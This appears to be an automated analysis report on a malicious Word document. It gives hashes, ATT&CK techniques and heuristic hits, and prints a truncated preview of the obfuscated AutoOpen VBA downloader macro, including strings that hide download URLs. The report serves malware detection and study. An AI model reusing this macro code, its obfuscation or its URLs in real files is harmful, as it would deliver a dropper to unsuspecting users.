Office (OLE) malware analysis — malicious · 5ae3adf5a34cd976

MALICIOUS

Office (OLE)

229.0 KB Created: 2017-12-19 23:35:00 Authoring application: Microsoft Office Word First seen: 2017-12-24

MD5: db5ac9b6b584f15ac8d0ab737136d9d9 SHA-1: 4cd038ff9e77669c2198229f2a7c8a5e3f63548d SHA-256: 5ae3adf5a34cd97669a7719eb3aef1ec607831e999f2b57506d416d0ef5829ae

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, indicating an attempt to execute arbitrary commands. This is further supported by the 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic firings. The presence of an AutoOpen macro suggests it is designed to execute automatically upon opening. The ClamAV signature 'Img.Dropper.PhishingLure-6443153-0' also points to a phishing lure, likely a downloader.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://wwwg1y+g1y.cher.VNT+V In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 86682 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	86682 bytes
SHA-256: `2914bfd08bf577bcce6a05b42e9348f7d9a5e4214dd0793657b8e994cf737207`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "HnswGnSC" Sub AutoOpen() On Error Resume Next iIkrckZra = (2772 * CStr(CtqWLCwtAYwH * Rnd(tKUrnwjhzG)) / 1988 / ChrB(zMfcBDGGtOYmRs * CBool(136465363 - CDbl(UVHuOlXirhHtm + rECnwXwXTswSs)))) + (179478542 / Fix(982) - LUXDzuiNa * Fix(rJbinvt + Log(TNCJVwVV))) tzCOzwsJW = (2772 * CStr(JEurOdizvm * Rnd(UjXzmwfKCzYhdB)) / 1988 / ChrB(LLHvQSIRloPc * CBool(136465363 - CDbl(ZiXCiaZNiPKzNz + XkXQqhSTqA)))) + (179478542 / Fix(982) - cMRmKWWjlX * Fix(VzDbTjwwzCT + Log(tARzlRGLhCLzN))) vsEobhNwv = (2772 * CStr(XMONlWtCT * Rnd(YYltXkPi)) / 1988 / ChrB(uTnGOXor * CBool(136465363 - CDbl(WVFqwlum + DVonAsnoXG)))) + (179478542 / Fix(982) - QqSilAvj * Fix(AqzflfwD + Log(ZAzkNLJWHSvS))) ZzijrfDXF = (2772 * CStr(pKfWNXJBUujHwF * Rnd(jdGYOtdn)) / 1988 / ChrB(aqPzuAujcbKoF * CBool(136465363 - CDbl(zlNFwBiSBcTLC + wrEMXrwXIKHUzD)))) + (179478542 / Fix(982) - WuYamInAnil * Fix(Ipmfizw + Log(kWwRNuacCwdC))) Application.Run "oIzVIQQbnSY", QtjivwDjBUPqd fnihvkPnL = (2772 * CStr(RhlmniWiYWBVu * Rnd(wHNsiKwoBjZUKF)) / 1988 / ChrB(wiKXuFQfbGsG * CBool(136465363 - CDbl(aGAKtikoXX + AscjBMT)))) + (179478542 / Fix(982) - QuZorwzufb * Fix(lpDaOuiPafUw + Log(KEWCckiOnVp))) dASJMtjFN = (2772 * CStr(mQzSOlSzsrww * Rnd(dmbzSuwXzUOwOc)) / 1988 / ChrB(DjwPjqYnZk * CBool(136465363 - CDbl(wLRudtfBo + kwRKQNowjV)))) + (179478542 / Fix(982) - JttLvhP * Fix(FwCNEwkG + Log(qVQMnBS))) kiESdkrqO = (2772 * CStr(pRXjhLQtj * Rnd(hjMOfGlFOF)) / 1988 / ChrB(WsbbQcwfUGMzr * CBool(136465363 - CDbl(TjTIJzTD + lBSqnWwmcIZ)))) + (179478542 / Fix(982) - ZwIRiUOOR * Fix(jUHMXRwEFU + Log(OpZwmIIVU))) kqSotnLra = (2772 * CStr(EpLQRzjbzhp * Rnd(DEALGiSwLG)) / 1988 / ChrB(wktCTTkGFdZQc * CBool(136465363 - CDbl(ZHADhIo + MnOnihcYiUw)))) + (179478542 / Fix(982) - PfYvPHPbkudnXH * Fix(aSsdzDRXFnf + Log(CdjwFRfoujEn))) End Sub Function QtjivwDjBUPqd() On Error Resume Next XTvwJ = (2772 * CStr(sqifZLNjPcBqbA * Rnd(GwTIinXnp)) / 1988 / ChrB(nwRlsXfztqtE * CBool(136465363 - CDbl(nBlSJoNSw + nZuXzKGUCptl)))) + (179478542 / Fix(982) - wvWFVtiJY * Fix(jjGsVOz + Log(TpOdMzzimmV))) kpvacw = (2772 * CStr(lbcwjlIhG * Rnd(fXOmXMFhC)) / 1988 / ChrB(fmZlLGVYfQXzCk * CBool(136465363 - CDbl(aHBmpRIUoXaTip + iamplwBqmdPjCp)))) + (179478542 / Fix(982) - fVdnwEDvNiXRlO * Fix(mnjkiwMMzzYR + Log(JZiGftrFp))) RSkwdb = Mid("9aPCYhSEi1ct8Du1y+g1yNTuniorg1y+g1ysharvVNT+VNTaVNT+VNTrd.comg1y+g1y/7ND7VNT+VNTMVNT+VNT/,http://wwwg1y+g1y.cher.VNT+V'+'NTcVNT+VNTomVNT+VNT.br/nE2LTYVNT+VNT/kN'+'QVNT+Vg1y+'+'g1yNXO", 16, 165) DvMmhvQJSTu = (2772 * CStr(OXBnpXmjrZQYO * Rnd(OrqRlGDNaw)) / 1988 / ChrB(SiYGnGv * CBool(136465363 - CDbl(inIiTDzcPktYp + pjHrUBPnB)))) + (179478542 / Fix(982) - EmWpNdESVkjjFM * Fix(OndncjXLEs + Log(wvmtYulLZjhIO))) WPiGXsio = (2772 * CStr(wPzjijk * Rnd(CchptjSFWk)) / 1988 / ChrB(sJNwEFBTG * CBool(136465363 - CDbl(inikvwJsBR + AvRwLiQL)))) + (179478542 / Fix(982) - VIqjFvkRsihNiz * Fix(pCEwkIMVSB + Log(NwBtWkHKzVwzf))) fmuWlhV = (2772 * CStr(jbDEhFiuUGNl * Rnd(ZQhbRwYiIjbMlz)) / 1988 / ChrB(mqjfPBvFUGWnKD * CBool(136465363 - CDbl(fjmvMusFPLq + XubsvHkI)))) + (179478542 / Fix(982) - ahWzdLMUvJN * Fix(iAuZqlAtlQT + Log(tYKsOafavz))) QiLERWANiPT = Mid("fbC25YlN'+'T+VNTdyVNT+VNT'+'.sig1y+g1yte/FVNT+VNTmV3iB/,ht'+'tp://wVNT+VNTww.d'+'ougV'+'NT+VNTsg1y+g1yunlimitVNT+VNTed.com/pg1y+g1yA7isz", 8, 125) YiLzq = (2772 * CStr(LrzXkzV * Rnd(sGIdSbmInYfNho)) / 1988 / ChrB(zHzFTzCsF * CBool(136465363 - CDbl(zYQMziCWRD + ksRjXqiYSSSXbA)))) + (179478542 / Fix(982) - nuBwqODEU * Fix(WvppdqQ + Log(UPOfZwITUmGf))) CksFs = (2772 * CStr(laTZCnwbZ * Rnd(zOYINPDHvi)) / 1988 / ChrB(VvpVDOhnztkSlo * CBool(136465363 - CDbl(FlXIMsuroljQtS + FkWVPfd)))) + (179478542 / Fix(982) - wYOobbN * Fix(mUOJRkmRDaDAjU + Log(oVtoAwPYUbjYjw))) dQVuiQjB = (2772 * CStr(oMivIUU * Rnd(hhozdButj)) / 1988 / ChrB(bCnHlA ... (truncated)

SHA-256: 2914bfd08bf577bcce6a05b42e9348f7d9a5e4214dd0793657b8e994cf737207

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "HnswGnSC"
Sub AutoOpen()
On Error Resume Next
iIkrckZra = (2772 * CStr(CtqWLCwtAYwH * Rnd(tKUrnwjhzG)) / 1988 / ChrB(zMfcBDGGtOYmRs * CBool(136465363 - CDbl(UVHuOlXirhHtm + rECnwXwXTswSs)))) + (179478542 / Fix(982) - LUXDzuiNa * Fix(rJbinvt + Log(TNCJVwVV)))
tzCOzwsJW = (2772 * CStr(JEurOdizvm * Rnd(UjXzmwfKCzYhdB)) / 1988 / ChrB(LLHvQSIRloPc * CBool(136465363 - CDbl(ZiXCiaZNiPKzNz + XkXQqhSTqA)))) + (179478542 / Fix(982) - cMRmKWWjlX * Fix(VzDbTjwwzCT + Log(tARzlRGLhCLzN)))
vsEobhNwv = (2772 * CStr(XMONlWtCT * Rnd(YYltXkPi)) / 1988 / ChrB(uTnGOXor * CBool(136465363 - CDbl(WVFqwlum + DVonAsnoXG)))) + (179478542 / Fix(982) - QqSilAvj * Fix(AqzflfwD + Log(ZAzkNLJWHSvS)))
ZzijrfDXF = (2772 * CStr(pKfWNXJBUujHwF * Rnd(jdGYOtdn)) / 1988 / ChrB(aqPzuAujcbKoF * CBool(136465363 - CDbl(zlNFwBiSBcTLC + wrEMXrwXIKHUzD)))) + (179478542 / Fix(982) - WuYamInAnil * Fix(Ipmfizw + Log(kWwRNuacCwdC)))
Application.Run "oIzVIQQbnSY", QtjivwDjBUPqd
fnihvkPnL = (2772 * CStr(RhlmniWiYWBVu * Rnd(wHNsiKwoBjZUKF)) / 1988 / ChrB(wiKXuFQfbGsG * CBool(136465363 - CDbl(aGAKtikoXX + AscjBMT)))) + (179478542 / Fix(982) - QuZorwzufb * Fix(lpDaOuiPafUw + Log(KEWCckiOnVp)))
dASJMtjFN = (2772 * CStr(mQzSOlSzsrww * Rnd(dmbzSuwXzUOwOc)) / 1988 / ChrB(DjwPjqYnZk * CBool(136465363 - CDbl(wLRudtfBo + kwRKQNowjV)))) + (179478542 / Fix(982) - JttLvhP * Fix(FwCNEwkG + Log(qVQMnBS)))
kiESdkrqO = (2772 * CStr(pRXjhLQtj * Rnd(hjMOfGlFOF)) / 1988 / ChrB(WsbbQcwfUGMzr * CBool(136465363 - CDbl(TjTIJzTD + lBSqnWwmcIZ)))) + (179478542 / Fix(982) - ZwIRiUOOR * Fix(jUHMXRwEFU + Log(OpZwmIIVU)))
kqSotnLra = (2772 * CStr(EpLQRzjbzhp * Rnd(DEALGiSwLG)) / 1988 / ChrB(wktCTTkGFdZQc * CBool(136465363 - CDbl(ZHADhIo + MnOnihcYiUw)))) + (179478542 / Fix(982) - PfYvPHPbkudnXH * Fix(aSsdzDRXFnf + Log(CdjwFRfoujEn)))
End Sub
Function QtjivwDjBUPqd()
On Error Resume Next
XTvwJ = (2772 * CStr(sqifZLNjPcBqbA * Rnd(GwTIinXnp)) / 1988 / ChrB(nwRlsXfztqtE * CBool(136465363 - CDbl(nBlSJoNSw + nZuXzKGUCptl)))) + (179478542 / Fix(982) - wvWFVtiJY * Fix(jjGsVOz + Log(TpOdMzzimmV)))
kpvacw = (2772 * CStr(lbcwjlIhG * Rnd(fXOmXMFhC)) / 1988 / ChrB(fmZlLGVYfQXzCk * CBool(136465363 - CDbl(aHBmpRIUoXaTip + iamplwBqmdPjCp)))) + (179478542 / Fix(982) - fVdnwEDvNiXRlO * Fix(mnjkiwMMzzYR + Log(JZiGftrFp)))
RSkwdb = Mid("9aPCYhSEi1ct8Du1y+g1yNTuniorg1y+g1ysharvVNT+VNTaVNT+VNTrd.comg1y+g1y/7ND7VNT+VNTMVNT+VNT/,http://wwwg1y+g1y.cher.VNT+V'+'NTcVNT+VNTomVNT+VNT.br/nE2LTYVNT+VNT/kN'+'QVNT+Vg1y+'+'g1yNXO", 16, 165)
DvMmhvQJSTu = (2772 * CStr(OXBnpXmjrZQYO * Rnd(OrqRlGDNaw)) / 1988 / ChrB(SiYGnGv * CBool(136465363 - CDbl(inIiTDzcPktYp + pjHrUBPnB)))) + (179478542 / Fix(982) - EmWpNdESVkjjFM * Fix(OndncjXLEs + Log(wvmtYulLZjhIO)))
WPiGXsio = (2772 * CStr(wPzjijk * Rnd(CchptjSFWk)) / 1988 / ChrB(sJNwEFBTG * CBool(136465363 - CDbl(inikvwJsBR + AvRwLiQL)))) + (179478542 / Fix(982) - VIqjFvkRsihNiz * Fix(pCEwkIMVSB + Log(NwBtWkHKzVwzf)))
fmuWlhV = (2772 * CStr(jbDEhFiuUGNl * Rnd(ZQhbRwYiIjbMlz)) / 1988 / ChrB(mqjfPBvFUGWnKD * CBool(136465363 - CDbl(fjmvMusFPLq + XubsvHkI)))) + (179478542 / Fix(982) - ahWzdLMUvJN * Fix(iAuZqlAtlQT + Log(tYKsOafavz)))
QiLERWANiPT = Mid("fbC25YlN'+'T+VNTdyVNT+VNT'+'.sig1y+g1yte/FVNT+VNTmV3iB/,ht'+'tp://wVNT+VNTww.d'+'ougV'+'NT+VNTsg1y+g1yunlimitVNT+VNTed.com/pg1y+g1yA7isz", 8, 125)
YiLzq = (2772 * CStr(LrzXkzV * Rnd(sGIdSbmInYfNho)) / 1988 / ChrB(zHzFTzCsF * CBool(136465363 - CDbl(zYQMziCWRD + ksRjXqiYSSSXbA)))) + (179478542 / Fix(982) - nuBwqODEU * Fix(WvppdqQ + Log(UPOfZwITUmGf)))
CksFs = (2772 * CStr(laTZCnwbZ * Rnd(zOYINPDHvi)) / 1988 / ChrB(VvpVDOhnztkSlo * CBool(136465363 - CDbl(FlXIMsuroljQtS + FkWVPfd)))) + (179478542 / Fix(982) - wYOobbN * Fix(mUOJRkmRDaDAjU + Log(oVtoAwPYUbjYjw)))
dQVuiQjB = (2772 * CStr(oMivIUU * Rnd(hhozdButj)) / 1988 / ChrB(bCnHlA
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.